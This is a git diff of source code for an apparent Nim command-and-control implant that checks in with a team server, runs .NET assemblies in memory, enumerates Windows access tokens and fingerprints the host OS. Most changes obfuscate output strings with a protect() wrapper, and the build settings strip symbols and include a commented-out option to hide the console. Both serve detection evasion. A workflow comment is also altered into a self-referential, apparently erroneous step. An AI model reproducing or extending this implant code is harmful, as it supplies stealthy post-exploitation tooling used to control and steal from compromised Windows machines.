diff --git a/src/agent/core/clr.nim b/src/agent/core/clr.nim index 8f1646b..91f07f5 100644 --- a/src/agent/core/clr.nim +++ b/src/agent/core/clr.nim @@ -1,5 +1,4 @@ import winim/[lean, clr] -import os import ../utils/[hwbp, io] import ../../common/utils @@ -60,7 +59,7 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri # Create AppDomain let appDomainType = mscorlib.GetType(protect("System.AppDomain")) let domainSetup = mscorlib.new(protect("System.AppDomainSetup")) - domainSetup.ApplicationBase = getCurrentDir() + domainSetup.ApplicationBase = protect("C:/Windows/System32") domainSetup.DisallowBindingRedirects = false domainSetup.DisallowCodeDownload = true domainSetup.ShadowCopyFiles = protect("false") diff --git a/src/agent/core/context.nim b/src/agent/core/context.nim index ca6d969..77ed7fa 100644 --- a/src/agent/core/context.nim +++ b/src/agent/core/context.nim @@ -1,4 +1,4 @@ -import parsetoml, system +import parsetoml import ../utils/io import ../../common/[types, utils, crypto, serialize] diff --git a/src/agent/core/process.nim b/src/agent/core/process.nim index 8c65e0d..32d0e33 100644 --- a/src/agent/core/process.nim +++ b/src/agent/core/process.nim @@ -1,7 +1,7 @@ import winim/lean -import strutils, strformat, tables, algorithm +import tables import ../utils/io -import ../../common/[types, utils] +import ../../common/utils import token type diff --git a/src/agent/core/token.nim b/src/agent/core/token.nim index 3f452c6..44cea02 100644 --- a/src/agent/core/token.nim +++ b/src/agent/core/token.nim @@ -1,7 +1,7 @@ import winim/lean import strformat import ../utils/io -import ../../common/[types, utils] +import ../../common/utils #[ Token impersonation & manipulation @@ -176,7 +176,7 @@ proc getTokenGroups(hToken: HANDLE, apis: Apis = initApis()): string = groupCount = pGroups.GroupCount groups = cast[ptr UncheckedArray[SID_AND_ATTRIBUTES]](addr pGroups.Groups[0]) - result &= fmt"Group memberships ({groupCount})" & "\n" + result &= protect("Group memberships (") & $groupCount & protect(")\n") for i, group in groups.toOpenArray(0, int(groupCount) - 1): result &= fmt" - {sidToString(group.Sid, apis):<50} {sidToName(group.Sid)}" & "\n" @@ -203,9 +203,9 @@ proc getTokenPrivileges(hToken: HANDLE, apis: Apis = initApis()): string = privCount = pPrivileges.PrivilegeCount privs = cast[ptr UncheckedArray[LUID_AND_ATTRIBUTES]](addr pPrivileges.Privileges[0]) - result &= fmt"Privileges ({privCount})" & "\n" + result &= protect("Privileges (") & $privCount & protect(")\n") for i, priv in privs.toOpenArray(0, int(privCount) - 1): - let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: "Enabled" else: "Disabled" + let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: protect("Enabled") else: protect("Disabled") result &= fmt" - {privilegeToString(addr priv.Luid):<50} {enabled}" & "\n" @@ -213,15 +213,15 @@ proc getTokenInfo*(hToken: HANDLE): string = let apis = initApis() let (tokenId, tokenType) = getTokenStatistics(hToken, apis) - result &= fmt"TokenID: 0x{tokenId}" & "\n" - result &= fmt"Type: {tokenType}" & "\n" + result &= protect("TokenID: 0x") & tokenId & "\n" + result &= protect("Type: ") & tokenType & "\n" let (username, sid) = getTokenUser(hToken, apis) - result &= fmt"User: {username}" & "\n" - result &= fmt"SID: {sid}" & "\n" + result &= protect("User: ") & username & "\n" + result &= protect("SID: ") & sid & "\n" let isElevated = getTokenElevation(hToken, apis) - result &= fmt"Elevated: {$isElevated}" & "\n" + result &= protect("Elevated: ") & $isElevated & "\n" result &= getTokenGroups(hToken, apis) result &= getTokenPrivileges(hToken, apis) diff --git a/src/agent/main.nim b/src/agent/main.nim index 1c06344..705c21c 100644 --- a/src/agent/main.nim +++ b/src/agent/main.nim @@ -19,7 +19,7 @@ proc main() = 3. Register to the team server if not already connected 4. Retrieve tasks via checkin request to a GET endpoint 5. Execute task and post result - 6. If additional tasks have been fetched, go to 3. + 6. If additional tasks have been fetched, go to 6. 7. If no more tasks need to be executed, go to 1. ]# while true: diff --git a/src/agent/nim.cfg b/src/agent/nim.cfg index 9554f7e..0b3f106 100644 --- a/src/agent/nim.cfg +++ b/src/agent/nim.cfg @@ -2,7 +2,8 @@ -d:agent -d:release --opt:size ---passL:"-s" # Strip symbols, such as sensitive function names +--l:"-Wl,-s" +# --l:"-Wl,-subsystem,windows" # Prevent console window -d:CONFIGURATION="PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER" -d:MODULES="511" -d:VERBOSE="true" diff --git a/src/agent/protocol/registration.nim b/src/agent/protocol/registration.nim index 73575ca..94bc235 100644 --- a/src/agent/protocol/registration.nim +++ b/src/agent/protocol/registration.nim @@ -99,7 +99,7 @@ type productType: ProductType name: string -const VERSIONS = [ +let versions = [ # Windows 11 / Server 2022+ # WindowsVersion(major: 10, minor: 0, buildMin: 22631, buildMax: 0, productType: WORKSTATION, name: protect("Windows 11 23H2")), # WindowsVersion(major: 10, minor: 0, buildMin: 22621, buildMax: 22630, productType: WORKSTATION, name: protect("Windows 11 22H2")), @@ -135,7 +135,7 @@ const VERSIONS = [ WindowsVersion(major: 5, minor: 1, buildMin: 0, buildMax: 0, productType: WORKSTATION, name: protect("Windows XP")), ] -proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = +proc matchVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = if info.dwMajorVersion != version.major or info.dwMinorVersion != version.minor: return false if productType != version.productType: @@ -147,8 +147,8 @@ proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType return true proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string = - for version in VERSIONS: - if version.matchesVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown + for version in versions: + if version.matchVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown if productType == DC: return version.name & protect(" (Domain Controller)") else: